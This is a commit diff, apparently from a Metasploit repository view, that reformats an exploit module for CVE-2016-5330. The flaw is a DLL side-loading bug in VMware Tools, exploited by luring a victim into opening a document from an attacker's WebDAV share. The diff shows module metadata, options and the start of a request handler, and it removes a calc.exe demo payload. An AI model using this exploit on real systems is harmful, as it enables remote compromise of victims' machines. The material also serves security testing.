Browse Source

Update vmhgfs_webdav_dll_sideload

wchen-r7 3 years ago
parent
commit
51c457dfb3
1 changed files with 19 additions and 22 deletions
  1. 19
    22
      modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb

+ 19
- 22
modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb View File

@@ -1,4 +1,3 @@
1
-# Based on WebDAV Application DLL Hijacker module
2 1
 require 'msf/core'
3 2
 
4 3
 class MetasploitModule < Msf::Exploit::Remote
@@ -9,8 +8,8 @@ class MetasploitModule < Msf::Exploit::Remote
9 8
 
10 9
   def initialize(info = {})
11 10
     super(update_info(info,
12
-      'Name'			=> 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',
13
-      'Description'	=> %q{
11
+      'Name'           => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',
12
+      'Description'    => %q{
14 13
       A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,
15 14
       a component of VMware Tools. This issue can be exploited by luring a victim into
16 15
       opening a document from the attacker's share. An attacker can exploit this issue to
@@ -18,9 +17,9 @@ class MetasploitModule < Msf::Exploit::Remote
18 17
       result in the attacker taking complete control of the affected system. If the WebDAV
19 18
       Mini-Redirector is enabled, it is possible to exploit this issue over the internet.
20 19
       },
21
-      'Author'		=> 'Yorick Koster',
22
-      'License'		=> MSF_LICENSE,
23
-      'References' =>
20
+      'Author'         => 'Yorick Koster',
21
+      'License'        => MSF_LICENSE,
22
+      'References'     =>
24 23
         [
25 24
           ['CVE', '2016-5330'],
26 25
           ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],
@@ -28,35 +27,33 @@ class MetasploitModule < Msf::Exploit::Remote
28 27
         ],
29 28
       'DefaultOptions' =>
30 29
         {
31
-          'EXITFUNC' => 'thread',
32
-          'PAYLOAD' => 'windows/exec',
33
-          'CMD' => 'C:\\Windows\\System32\\calc.exe',
30
+          'EXITFUNC' => 'thread'
34 31
         },
35
-      'Payload'		=> { 'Space'	=> 2048, },
36
-      'Platform'		=> 'win',
37
-      'Targets' =>
32
+      'Payload'        => { 'Space' => 2048, },
33
+      'Platform'       => 'win',
34
+      'Targets'        =>
38 35
         [
39
-          [ 'Windows x64', {'Arch' => ARCH_X64,} ],
40
-          [ 'Windows x86', {'Arch' => ARCH_X86,} ],
36
+          [ 'Windows x64', {'Arch' => ARCH_X86_64,} ],
37
+          [ 'Windows x86', {'Arch' => ARCH_X86,} ]
41 38
         ],
42
-      'Privileged' => false,
39
+      'Privileged'     => false,
43 40
       'DisclosureDate' => 'Aug 5 2016',
44
-      'DefaultTarget' => 0))
41
+      'DefaultTarget'  => 0))
45 42
 
46 43
     register_options(
47 44
       [
48
-        OptPort.new('SRVPORT',		[ true, "The daemon port to listen on (do not change)", 80 ]),
49
-        OptString.new('URIPATH',	[ true, "The URI to use (do not change)", "/" ]),
50
-        OptString.new('BASENAME',	[ true, "The base name for the docx file", "Document1" ]),
51
-        OptString.new('SHARENAME',	[ true, "The name of the top-level share", "documents" ]),
45
+        OptPort.new('SRVPORT',     [ true, "The daemon port to listen on (do not change)", 80 ]),
46
+        OptString.new('URIPATH',   [ true, "The URI to use (do not change)", "/" ]),
47
+        OptString.new('BASENAME',  [ true, "The base name for the docx file", "Document1" ]),
48
+        OptString.new('SHARENAME', [ true, "The name of the top-level share", "documents" ])
52 49
       ], self.class)
53 50
 
54
-    deregister_options('SSL', 'SSLVersion', 'SSLCert') # no SSL
51
+    # no SSL
52
+    deregister_options('SSL', 'SSLVersion', 'SSLCert')
55 53
   end
56 54
 
57 55
 
58 56
   def on_request_uri(cli, request)
59
-
60 57
     case request.method
61 58
     when 'OPTIONS'
62 59
       process_options(cli, request)

Loading…
Cancel
Save